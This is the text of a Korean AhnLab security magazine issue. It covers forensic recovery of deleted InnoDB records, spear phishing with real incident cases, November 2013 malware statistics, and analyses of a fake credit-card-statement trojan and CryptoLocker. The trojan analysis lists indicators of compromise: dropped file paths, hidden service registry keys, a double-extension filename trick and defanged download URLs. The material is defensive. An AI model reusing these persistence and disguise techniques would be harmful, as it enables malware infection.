frm의구조에대해서는 frm 파일이필수적으로필요한 MyISAM 방식과함께 3부에서살펴보도록하겠다. InnoDB 버전별헤더구조 ibdata 파일은각각의데이터를쉽게구분하기하기위해데이터를페이지 ( 블록 ) 단위로구성하고있다. 하나의페이지는 16,384 바이트며, 여러개의페이지를하나로합친것이 ibdata 파일이다. ibdata는각페이지의상단 ( 헤더 ) 에는해당페이지의속성을정의하는다양한정보가존재하기때문에헤더가갖고있는값에주목할필요가있다. 일반적으로리프노드에해당하는모든페이지들은 [ 그림 2] 와같이파일헤더 (FilHeader) 와페이지헤더 (PageHeader), 레코드 (Record) 속성, 데이터 (Data) 항목으로구성되어있다. 각페이지에는페이지의시작위치를기준으로 [ 표 2] 의파일헤더항목과 [ 표 3] 의페이지헤 이름 위치 (Offset) 크기 [ 표 3] 페이지헤더항목및설명 ( 출처 : MySQL, http://dev.mysql.com/doc/internals/) 설명 PAGE_N_DIR_SLOTS 26~27 2 바이트 Page Directory 의개수 PAGE_HEAP_TOP 28~29 2 바이트첫레코드의위치 ( 오프셋 ) PAGE_N_HEAP 2A~2B 2 바이트레코드의개수 PAGE_FREE 2C~2D 2 바이트삭제된레코드의위치 ( 오프셋 ) PAGE_GARBAGE 2E~2F 2 바이트삭제된레코드의개수 PAGE_LAST_INSERT 30~31 2 바이트마지막에삽입된레코드의위치 PAGE_DIRECTION 32~33 2 바이트페이지의종류 PAGE_N_DIRECTION 34~35 2 바이트삽입된페이지의개수 PAGE_N_RECS 36~37 2 바이트사용자레코드의개수 PAGE_MAX_TRX_ID 38~3F 8 바이트트랜잭션을위한 ID PAGE_LEVEL 40~41 2 바이트노드의레벨 PAGE_INDEX_ID 42~49 8 바이트페이지가속하는 INDEX 의 ID PAGE_BTR_SEG_ LEAF PAGE_BTR_SEG_ TOP 4A~53 10 바이트 Leaf 페이지에대한 segment 헤더 54~5D 10 바이트 Nonleaf 페이지에대한헤더 17
[ 표 2] 와 [ 표 3] 은 [ 그림 2] 가어떤헤더값을갖고있는지보여준다. InnoDB는기본적으로 ibdata 파일의리프노드에모든데이터를저장한다. 따라서 InnoDB 방식의데이터베이스를분석하기위해서는리프노드에초점을맞추어분석을진행해야한다. 리프노드는페이지의 FIL_PAGE_TYPE 값 (0x45BF) 을확인하여찾을수있다. FIL_ PAGE_TYPE 값을확인해해당페이지가리프노드로판단되면어떤데이터가입력되어있는지분석할수있다. [ 표 4] 는 FIL_PAGE_TYPE 항목에올수있는값을설명한것이다. 해당표의 FIL_PAGE_INDEX (0x45BF) 값이리프노드에해당되며, 데이터복구를위해중요한항목이다. FIL_PAGE_TYPE의종류값 (value) 설명 이름 비트수 설명 record_status 2 레코드의상태 deleted_flag 1 레코드의삭제여부 min_rec_flag 1 최소레코드의속성 n_owned 4 소유하는레코드의개수 heap_no 13 해당페이지에서의레코드번호 n_fields 9 레코드의필드개수 1byte_offs_flag 1 오프셋 byte의길이 next 16 bits 16 다음레코드의오프셋 [ 표 5] 리던던트포맷의속성정보 ( 출처 : MySQL, http://dev.mysql.com/doc/internals/) FIL_PAGE_TYPE_ALLOCATED 0 할당된페이지 FIL_PAGE_UNDO_LOG 2 실행취소로그페이지 FIL_PAGE_INODE 3 인덱스노드 FIL_PAGE_IBUF_FREE_LIST 4 추가삭제리스트버퍼 FIL_PAGE_IBUF_BITMAP 5 추가비트맵버퍼 FIL_PAGE_TYPE_SYS 6 시스템페이지 FIL_PAGE_TYPE_TRX_SYS 7 트랜잭션시스템데이터 FIL_PAGE_TYPE_FSP_HDR 8 파일스페이스헤더 FIL_PAGE_TYPE_XDES 9 디스크립터페이지 FIL_PAGE_TYPE_BLOB 10 압축되지않은 BLOB 페이지 FIL_PAGE_TYPE_ZBLOB 11 처음압축된 BLOB 페이지 FIL_PAGE_TYPE_ZBLOB2 12 다음압축된 BLOB 페이지 FIL_PAGE_INDEX 45BF B-tree node [ 표 4] FIL_PAGE_TYPE 항목의종류및값 ( 출처 : MySQL, http://dev.mysql.com/doc/internals/) 버전별 InnoDB 복구방안 MySQL의 InnoDB 저장방식은하나의레코드에하나의속성을부여하여헤더위치에저장한다 ([ 그림 2]). 레코드속성은크게리던던트포맷 (Redundant Format) 과콤팩트포맷 (Compact Format) 으로구분된다. 리던던트포맷은 InnoDB 저장방식이생긴이후로현재까지사용되고있는포맷이다. 콤팩트포맷은 MySQL 5.0 버전이후리던던트포맷의비효율성을해결하고데이터를효율적으로관리하기위해도입된포맷이다. 리던던트포맷과콤팩트포맷은각각의레코드가저장되기전에 6바이트길이로헤더에저장된다. 각포맷을통해정의된헤더값은각레코드의속성정보를파악할수있게해준다. 리던던트포맷과콤팩트포맷의각항목은비트단위로구성되어있으며각항목의비트길이에따라계산하여해당항목의값을계산할수있다. [ 표 5] 는리던던트포맷의각항목과비트수등을설명한것으로, 속성정보를통해현재레코드의상태정보와삭제여부, 최소레코드의속성, 소유하는레코드의개수, 다음레코드의오프셋정보등을확인할수있다. [ 그림 3] InnoDB 의레코드속성헤더값 [ 그림 3] 은각레코드의앞 6바이트에존재하는리던던트포맷의헤더이다. 이와같이 InnoDB에서레코드속성은 6바이트의속성정보를통해정의되며속성정보와함께각필드의길이정보도포함하고있다. 이같은방법을통해 MySQL 4 버전의 InnoDB 저장방식의데이터를분석할수있다. InnoDB 저장방식은 MyISAM에비해삭제된레코드의분석시에도장점이있다. MyISAM이필드의일부를다른정보로덮어쓰는것과달리 InnoDB는레코드의속성정보에서 deleted_flag 값만 1로바꾼후더이상의수정을하지않는다. 따라서삭제된지오래된레코드도복구할수있는가능성이높다. 또한 MyISAM에비해데이터를새로운레코드가덮어쓸가능성이낮기때문에복구하기도상당히유리하다. MySQL 5 버전으로넘어가면서 InnoDB는기존에사용하던리던던트포맷은그대로사용하면서콤팩트포맷을추가로도입하였다. 기존 4 버전의데이터베이스시스템관련필드와유저관련필드가모두리던던트포맷이었던반면, 5 버전부터는효율성을위해시스템관련필드는리던던트포맷을사용하고유저관련필드는콤팩트포맷을사용하도록개선되었다. 콤팩트포맷은기존의리던던트포맷과같이 6바이트의길이를차지하고있지만실제로활용하는길이는 5바이트이다. 이름비트수설명 record_status 2 레코드의상태 deleted_flag 1 레코드의삭제여부 min_rec_flag 1 최소레코드의속성 n_owned 4 소유하는레코드의개수 heap_no 13 해당페이지에서의레코드번호 record type 3 레코드타입정보 next 16 bits 16 다음레코드의오프셋 [ 표 6] 콤팩트포맷의속성정보 ( 출처 : MySQL, http://dev.mysql.com/doc/internals/) 18
[ 표 6] 은유저관련필드의레코드속성을정의하는콤팩트포맷이나타내는속성정보이다. 콤팩트포맷은리던던트포맷과큰차이는없으며, 더실용적인데이터활용을위해자주사용되지않는두개의필드를제거하였다. InnoDB는각각의레코드속성을통해각레코드의상태를파악할수있다. 이를통해정상적으로존재하는레코드인지, 삭제된레코드인지여부를판단할수있다. InnoDB는페이지헤더의 PAGE_HEAP_TOP 값을이용해정상레코드의시작위치를정의한다. 각레코드는리던던트포맷및콤팩트포맷의속성중 next 16bits를통해다음정상레코드의위치로연결된다. 마찬가지로삭제된레코드는페이지헤더의 PAGE_FREE 값을통하여첫번째삭제된레코드의위치로연결되며 next 16bits를통해다음삭제된레코드의위치로연결된다. 따라서페이지에서첫번째정상데이터, 또는첫번째삭제된데이터의위치만찾으면링크를통해모든정상데이터와삭제된데이터를찾을수있다. 링크를통한분석은특정레코드를빠르게분석하는데편리하다. InnoDB, 복구의안전성과신뢰도높아디지털포렌식관점에서삭제된레코드의복구는공격자가고의로데 이터를은닉하거나삭제한데이터를복구할수있다는점에서중요한의미를갖는다. 따라서가능한많은복구를이뤄내는것은중요하다. InnoDB의 ibdata 파일은페이지단위로구분할수있으며각페이지의속성값을통해해당페이지가리프노드인지여부를파악할수있다. 리프노드에일반적인레코드값이저장되어있기때문에리프노드를구분하는것이중요하다. 리프노드의페이지에서페이지헤더를이용해첫번째정상레코드또는첫번째삭제레코드를확인할수있으며하나의레코드를복구하면대부분의레코드복구가가능하기때문이다. InnoDB는버전에따라각레코드에사용하는포맷이다르다. 따라서각버전에따라각기다른형태로분석해야한다. 또한삭제된레코드에대한데이터손상이크지않기때문에복구관점에서도안전성과신뢰도가높다. InnoDB는 frm 파일과함께분석이이루어지면테이블단위의추출이가능하며더욱정교한분석이가능하다. 3부에서는 frm의구조분석과함께 MyISAM이어떻게복구되는지살펴보며 InnoDB와어떻게연결되어데이터를추출하고복구할수있는지알아보도록하겠다. 19
IT & Life Spear Phising 타깃공격, 스피어피싱 의창끝에서시작된다 미디어기업인사팀에근무하는김대리는어느날 [ 이력서 ]*** 부서지원 이라는제목의메일을수신했다. 평소와같이메일을확인하고첨부되어있는문서파일을열었다. 일반적인이력서형식을갖추고는있지만내용이부실해보였다. 인재풀을형성하는절차에따라김대리는그이력서파일을업무용 DB에저장했다. 그로부터정확히 8개월후, 회사의기밀정보일부가유출된사건이발생했다. 조사결과, 김대리의 PC에침투한악성코드가공격의시작점이었던것으로드러났다. 회사에서자신의업무와관련된제목의메일을받았을때, 또는지인이나평소즐겨이용하는인터넷서비스의계정에서발송된메일을열어보지않을사람이과연얼마나될까? 알고있는 (?) 발송자가보내온메일에첨부된문서파일을의심하는사람은또얼마나될까? 이같은빈틈을파고드는사이버공격이바로 스피어피싱 이다. 스피어피싱이란? 작살로물고기를잡는 작살낚시 (Spear Fishing) 라는말에서유래된스피어피싱 (Spear Phishing) 은 창, 창으로찌르다 라는의미의영어단어스피어 (Spear) 와 사용자를속이기위한사기이메일및기타행위 를의미하는보안용어인피싱 (Phishing) 의합성어이다. 불특정다수가아닌특정인 ( 조직 ) 을표적으로, 신뢰할만한발신인이보낸것처럼위장한메일을이용해악성웹사이트로유도또는악성첨부파일로악성코드에감염시키는일종의온라인사기행위 로정의할수있다. 우리말로옮기면 표적형악성메일 로이해할수있다. 사용자가속을법한내용의메일에악성코드를첨부하는것은상당히고전적인공격방식이다. 문제는이런방법이아직도효과가있다는점이다. 때문에보안전문가들은 최대의보안취약점은바로사람 이라고지적하고있다. 특히악의적인목적으로발송된다는점은동일하지만스피어피싱이스팸메일등과구별되는점은 불특정다수가아닌특정기관또는기업을노린다는점 ( 표적성 ) 기밀정보유출, 시스템파괴등구체적인목표를위한악성코드를이용한다는점 ( 심각성 ) 정상적인파일로보이거나의심하기어려울정도로실제메일처럼보이게하는정교함등을들수있다. 스피어피싱, 무엇이그토록두려울까? 스피어피싱과같은표적공격을위해해커는페이스북, 트위터와같은 SNS(Social Network Service) 를비롯해다양한경로를통해표적이자주방문하는웹사이트, 취미, 소속조직등대상에대한정보를수집한다. 짧게는몇개월, 길게는 1년이상공격대상에관한거의모든정보를수집하기위해노력과시간을아끼지않는경우도많다. 이렇게수집한정보로공격대상의관심과호기심을자극하는이메일과첨부파일을발송하는사회공학적 (Social Engineering) 기법을이용하는스피어피싱의경우라면개인이이같은위협을피하기는쉽지않다. 게다가한개인에대한위협에서그치는것이아니라그개인이속한조직의막대한피해로이어질수있다는것도스피어피싱이위험한이유다. 보안전문가들은악성코드가기업이나기관의시스템에침투하는데성공하면이후에는들키지않고내부망을돌아다니며취약한지점을찾아내고이를이용해기밀정보를유출하거나내부망시스템을장악하는것은어려운일이아니라고지적하고있다. 개인이별다른의심없이이메일이나첨부파일을클릭하는순간악성코드에감염되고공격자는최종목적을달성하기위한공격의교두보를확보하게되는것이다. 20
물론, 개인이일상생활에서스피어피싱의타깃이되는경우는흔치않을수도있다. 그러나한명의개인이기업이나기관에속한경우라면, 특히소속된곳에서중요한직책이나업무를담당하고있다면얘기가달라진다. 스피어피싱은지능형지속위협인 APT와같은고도화된공격의시작점이기때문이다. 이같은스피어피싱에는첨부파일이동반되는경우가많다. 안랩의조사결과, exe나 dll 등의실행파일을이용하던방식에서최근에는사람들이별다른의심없이파일을열어보도록하기위해서 doc, pdf, hwp, xls 등문서파일이나 zip 등의압축파일과같은비실행형파일을많이이용하는추세다. [ 그림 1] 워드파일로위장한악성파일 ( 출처 : ASEC Report Vol.46) 사람들이주로이용하는문서프로그램의소프트웨어취약점을이용해문서파일에악성코드를심어사용자에게발송한후사용자가문서파일을열어보면악성코드에감염되도록하는것이다. exe나 dll 등의실행파일이지만파일명이나아이콘형태를문서파일인것처럼속여사용자가파일을열어보도록유도하는방식도나타나고있다. [ 그림 2] 문서파일로위장한실행파일 ( 출처 : ASEC Report Vol.46) 뉴욕타임스, EMC RSA 공격에도스피어피싱이용돼스피어피싱이 APT에이용된가장대표적인사례는지난 2013년 2월알려진뉴욕타임스 (New York Times, 이하 NYT) 해킹이다. 공격자는 NYT 상하이지부책임자와남아시아책임자 ( 전베이징지부책임자 ) 의메일을해킹한후약 4개월간 NYT 내부시스템에악성코드를설치하는등지속적인공격을가했다. 이공격의시작이바로내부혹은외부기관 기업으로위장한스피어피싱으로알려져있다. 이에앞서 2011년글로벌보안업체 EMC RSA의 OTP 제품과관련된기밀정보가유출된사건에도스피어피싱이이용됐다. EMC RSA는사건발생후자사블로그를통해공격의시작이 2011 인원채용계획 이라는제목의스피어피싱메일이라고밝혔다. 같은해세계최대이메일마케팅업체인미국엡실론 (Epsilon) 사또한스피어피싱에의해 JP모건체이스, 시티뱅크, 디즈니, 베스트바이등 50 여개주요고객사의명단과이메일주소를탈취당했다. 이사건으로인해엡실론사는 40억달러에이르는피해를입었으며, 특히고객사이메일계정을이용한 2차피해를야기할수있다는우려를샀다. 집요한스피어피싱, 피할수는없을까? APT 공격등고도의사이버공격의시발점으로많이이용되고있는스피어피싱. 이로부터개인과그개인이속한조직을보호하려면조직과개인모두의노력이필요하다. 기업및기관은스피어피싱의심각성에대해충분히인지하고전반적인관점에서대응방안을마련해야한다. 특히스피어피싱이어떻게 APT 등심각한공격으로이어질수있는지맥락을파악하는것이중요하다. 스피어피싱을통해침투하는악성코드는특정한대상을노리고특별하 21
게제작되는맞춤형악성코드인경우가대부분이다. 따라서기존에알려진악성코드에대응하기위한안티바이러스는물론, 알려지지않은악성코드에대응할수있는다계층적인보안솔루션에대한고려도필요하다. 또한정기적인보안교육과내부보안담당자육성등의노력도동시에진행되어야한다. 이와함께개인의관심과노력이스피어피싱의피해를예방하는데상당한효과를거둘수있다. 우선, 조금이라도수상한메일의첨부파일이나 URL을실행하지않는것이스피어피싱을막기위한가장확실한방법이다. 또한주로사용하는소프트웨어프로그램의제조사에서제공하는보안패치나업데이트는반드시적용해야한다. 특히문서파일과같은비실행형파일을이용하는스피어피싱공격이증가하는추세인만큼소프트웨어업데이트는더욱중요하다. 아울러회사 PC에서실수로라도모르는사람에게서받은파일이나내용이엉성하거나조잡한파일을열었을때는즉시사내보안담당자에게연락해적절한조치를취할수있도록해야한다. 실제 APT 사례를통해확인된바와같이스피어피싱은정보유출부터시스템파괴까지막대한피해를유발하는공격의시작점이될수있다. 조직과그조직에속한개인의노력이동반되어야만스피어피싱의위협을피할수있다. 22
Statistics 보안통계와이슈 ASEC, 11 월악성코드통계및보안이슈발표 연말연시, 신용카드명세서악용한악성코드변종주의! 안랩시큐리티대응센터 (ASEC) 는 ASEC Report Vol.47 을통해지난 2013 년 11 월의보안통계및이슈를전했다. 11 월의주요보안 이슈를살펴본다. 11월, 여전히 트로이목마 류가강세 ASEC이집계한바에따르면, 2013년 11월에감염이보고된악성코드는 206만 6944건으로나타났다. 이는전월 233만 9014건에비해 27 만 2070건이감소한수치다. [ 그림 1] 월별악성코드감염보고건수변화추이 [ 그림 3] 2013 년 10 월과 11 월악성코드유형별비교 악성코드를유형별로살펴보면트로이목마가 56.1% 로가장높은비율을나타냈고, 웜과스크립트는각각 8.4%, 7.6% 의비율을차지했다. [ 그림 2] 는 2013년 10월, 1개월동안안랩이탐지한악성코드의유형별집계결과다. 11월신종악성코드중트로이목마류가 96% 달해 11월에신규로접수된악성코드중감염보고가가장많았던 20건을살펴본결과, Win-Trojan/Agent.704가 5024건으로전체의 26.2%, 그뒤를이어 Win-Trojan/Agent.704.B가 5168건으로 26.0% 를차지했다. [ 그림 2] 2013 년 11 월악성코드유형별감염비율 악성코드의유형별감염비율을지난 10월과비교하면 [ 그림 3] 과같다. 스크립트, 다운로더는전월에비해증가세를보인반면트로이목마, 웜, 바이러스, 애드웨어, 익스플로이트, 드롭퍼는소폭감소했다. 스파이웨어, 애프케어계열은전월수준을유지했다. [ 그림 4] 신종악성코드유형별분포 11월의신종악성코드를유형별로살펴본결과, [ 그림 4] 와같이트로이목마가 96% 로가장많았고애드웨어가 2%, 드롭퍼가 2% 로각각집계됐다. 23
2013년 11월주요보안이슈 신용카드명세서로위장한악성코드변종유포신용카드명세서로위장한악성코드변형이이메일을통해유포되었다. 해당메일에는 *******20131115_04922.zip이라는이름의압축파일이첨부되어있었다. 2013년 4월에보고된악성코드의변종이 10월 30일안랩클라우드서버 (ASD) 를통해수집되었으며, 11월 15일에는이름만바뀐변종파일이이메일을통해유포된것으로확인되었다. 이번에유포된메일에첨부된파일의압축을풀면 [ 그림 5] 와같이 html 파일로위장한 exe 파일이나타난다. [ 그림 6] 가짜신용카드명세서 서비스로등록된레지스트리는은폐되어레지스트리편집기에서는보이지않는다. [ 그림 7], [ 그림 8] 과같이루트킷탐지툴을이용하면확인할수있다. [ 그림 5] 압축해제시나타나는파일 파일이름과확장자사이에공백과점 (.) 문자를다수포함해실제카드명세서파일인 html 파일로오인해서실행하도록유도한다. [ 파일명 ] *******card_20131115_53430.html......html.exe 해당파일을실행하면사용자에게는 [ 그림 6] 과같이실제카드명세서처럼보이는페이지를보여주면서동시에아래와같은파일을생성하고, 시스템을시작할때자동실행되도록레지스트리에등록한다. [ 그림 7] 은폐된레지스트리내용 (GomPlaySvr) [ 파일생성 ] C:\Windows\System32\mshelp.htm ( 정상 ) C:\Windows\System32\msimbc.dll C:\Windows\System32\ruby.exe C:\Windows\System32\csdujwsxo.dll ( 랜덤파일명 ) C:\Windows\System32\mshytvjiil.ocx C:\Windows\System32\mstedgakl.dll C:\Windows\System32\yqixm.dll ( 랜덤파일명 ) C:\Windows\System32\anotggnk.dll [ 레지스트리등록 ] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ GomPlaySvr\Parameters] ServiceDll="%SystemRoot%\System32\csdujwsxo.dll" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VbSecurity\ Parameters] ServiceDll="%SystemRoot%\System32\yqixm.dll" [ 그림 8] 은폐된레지스트리내용 생성된파일중 mshelp.htm 파일은신용카드명세서이다. mshytvjiil. ocx, anotggnk.dll 파일은 *******card_20131115_53430..{ 생략 }.exe 파일실행시아래 URL에서다운로드되는 arp-ping.exe 파일과 setup_482.exe 파일이다. hxxp://www.eli******son.com/p******s/downloads/arpping-0.3/arp-ping.exe hxxp://neir***.fuzh****ng.com/setup_482.exe arp-ping 파일은 [ 그림 9] 와같은옵션으로구성되어있다. 24
[ 그림 9] arp-ping.exe 옵션 arp-ping.exe 파일은공격자가내부네트워크에위치한시스템상태 확인등에악용할수있다. [ 그림 10] 은 setup_482.exe 파일로, 중국에서제작된인터넷검색, 스크린샷, 알림및 PC 종료타이머기능등을제공하는 PUP와같은프로그램설치파일이다. 이설치파일은악성코드감염시설치되지는않는다. 생성된파일중 [ 그림 10] 과같이 4개의파일은정상윈도파일인 svchost.exe 프로세스에로드되어동작하면서특정한국내 IP로끊임없이접속을시도한다. [ 그림 11] 랜섬웨어크립토락커 (CryptoLocker) 감염화면 크립토락커는시스템에저장된워드 (Word), 엑셀 (Excel), 파워포인트 (PowerPoint), 이미지파일등다양한파일을암호화한다. 크립토락커에감염되면 [ 그림 12] 와같은경로에악성파일이생성된다. 해당파일은윈도시작레지스트리키에등록되어부팅시자동으로실행된다. [ 그림 10] svchost.exe 프로세스에로드된모듈 이외에도다수의 GIF, JPEG 포맷의이미지파일을다운로드하지만, 대부분정상파일이며일부손상된파일이포함되어있었다. 이후해당사이트에서악성파일로변경될수있을것으로추정된다. 이같은신용카드명세서를위장한악성파일은국내실정에맞춰정상파일과구분하기어렵도록정교하게제작되기때문에메일에첨부된파일을실행할때는각별히주의해야한다. 한편해당악성코드는 V3 제품을이용해진단및치료가가능하다. [ 그림 12] 파일생성정보 [ 그림 13] 은암호화된파일을나타내는화면이다. 암호화된문서파일 (PPT) 을실행하면 [ 그림 14] 와같이파일이열리지않는다. 암호화된이들파일은공개키방식으로암호화되어있어제작자서버에저장된개인키가없으면파일을복구하는것이불가능하다. PC의파일을암호화하는크립토락커최근시스템에저장된문서, 이미지파일등을암호화하여금전적대가를요구하는랜섬웨어크립토락커 (CryptoLocker) 가발견됐다. 이번에발견된크립토락커는이메일의첨부파일을통해유포되었으며, 일정시간이지나면암호화키가삭제되어복구할수없다는메시지를사용자에게보여준다. [ 그림 11] 은악성코드에감염된사용자에게나타나는화면이다. 암호화된파일리스트를확인하는메뉴와파일복구를위해 300 달러를요구하고있다. 300달러결제뿐만아니라비트코인으로결제하는메뉴도제공하고있다. [ 그림 13] 암호화된파일들 25
[ 그림 14] 암호화된파일실행시 최근해당랜섬웨어제작자가운영하는것으로추정되는크립토락커디크립션서비스 (CryptoLocker Decryption Service) 웹사이트가확인되었다 ([ 그림 15]). 이사이트는암호화된파일복구를위해 10BTC( 비트코인 ) 을요구한다. [ 그림 15] 크립토락커디크립션서비스 (CryptoLocker Decryption Service) 웹사이트 그러나악의적인목적으로제작된랜섬웨어는사용자가복구비용을지불하더라도파일이정상적으로복구되지않을수있어신중하게대처하는것이바람직하다. 한편크립토락커는현재 V3 제품을통해진단및치료가가능하다. 이밖에자세한보안관련통계및이슈에관한내용은안랩닷컴시큐리티센터내 ASEC 리포트에서확인할수있다. 26
AHNLAB NEWS 안랩, 권치중사장 CEO 선임 권치중號출범, 내실경영에초점맞춘다 신임권치중 CEO는약 30여년간국내외유수의 IT 기업에서영업과마케팅분야를총괄지휘해온경영전문가이다. 특히소속기업의영업신기록을경신할정도로매출신장률을높인영업통이면서도임직원및고객간원활한소통능력을바탕으로영업, 마케팅, 경영전략, 사업기획, 비전수립등에서성과를보여조직관리능력을인정받고있는것으로알려져있다. 권치중신임안랩 CEO 안랩은 2013년 12월 5일사업부문을총괄하던권치중부사장을사장으로승진발령하고권사장이 CEO 업무를수행한다고밝혔다. 신임권치중 CEO는 2014년초이사회와주주총회를거쳐대표이사로선임될예정이다. 한편신임권치중 CEO의등기이사선임을위한 2014년정기주총및이사회이전까지는김기인전무 (CFO) 가임시로대표이사직을수행할예정이다. 권치중 CEO는 2011년안랩에입사한이후사업을총괄해왔으며, 안랩입사전에는테크데이타부사장 (2010. 1 2011.10), KT의계열사인 KT FDS 대표이사 (2006. 11 2009. 12), BEA 시스템즈코리아영업총괄및부사장 (2002. 11 2005. 5), SGI 코리아대표이사 (1998. 6 2000. 8 상무 / 2000. 9 2002.9 대표이사 ) 등을역임했으며, 첫직장인 IBM코리아 (1983. 7 1994. 12) 에서 10년가까이근무하는등 IT 업계에서만 30년이상의전문경력을쌓아왔다. 권치중 CEO는 앞선김홍선대표의기술기반사업확장및성과를기반으로 2014년부터는그간확장해온사업을정착시키고내실을기하도록하라는의미에서저를선임한것으로알고있다. 국내최고의보안기업인안랩이핵심가치에기반하여존경받는글로벌기업이될수있도록최선을다하겠다 고포부를밝혔다. 안랩회계투명성부문대상수상 김기인전무 2013 한국 CFO 대상 수상 안랩 (CEO 권치중 www.ahnlab.com) 의 CFO(Chief Financial Officer, 최고재무책임자 ) 김기인전무가사단법인한국 CFO협회 ( 회장김상훈, www.cfokorea.org) 가 2013년 12월 20일, 웨스틴조선호텔에서주최한 2013 한국 CFO 대상 에서 회계투명성부문대상 을수상했다. 10회를맞이한 2013 한국 CFO 대상 은 기업구조조정 (Turnaround Management), 위험관리 (Risk Management), 기업인수 합병 (M&A), 자금조달 (Financing), 회계투명성 등총 5개부문으로나눠시상이진행됐다. 2013년 6월부터 10월까지경영컨설팅회사, 회계법인, 은행, 증권사, 신용평가사등전문기관으로부터우수한경영성과를보인기업 CFO를추천받아각부문별 2명씩, 총 10명이수상자로선정되었다. 한편, 안랩은창립이래투명경영원칙을높이평가받아 2007년에이어 2013년 5월, 두번째로한국회계학회로부터 2013 투명회계대상- 코스닥시장상장기업부문상 을수상한바있다. 또한, 제 11 회경제정의기업상 ( 경실련, 공정거래위, 2002년 ), 제 1회한국윤리경영대상-투명경영부문대상 ( 신산업경영원, 산업자원부, 2003 년 ) 제 1회경영정보대상-투명경영부문대상 ( 한국회계정보학회, 2003) 등을수상한바있다. 김기인전무는재무경영실적, 재무건전성, 경영투명성부문에서회계투명성을이끌고, 건전한견제와균형이가능한선진기업지배구조를정착시키기위한노력을인정받아 회계투명성부문대상 을수상했다. 김기인안랩전무, 2013 한국 CFO 대상 수상 27
발행인 : 권치중발행처 : 주식회사안랩경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 편집인 : 안랩콘텐츠기획팀디자인 : 안랩 UX디자인팀 2014 AhnLab, Inc. All rights reserved. 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다. 28
http://www.ahnlab.com http://blog.ahnlab.com http://twitter.com/ahnlab_man 경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 2014 AhnLab, Inc. All rights reserved.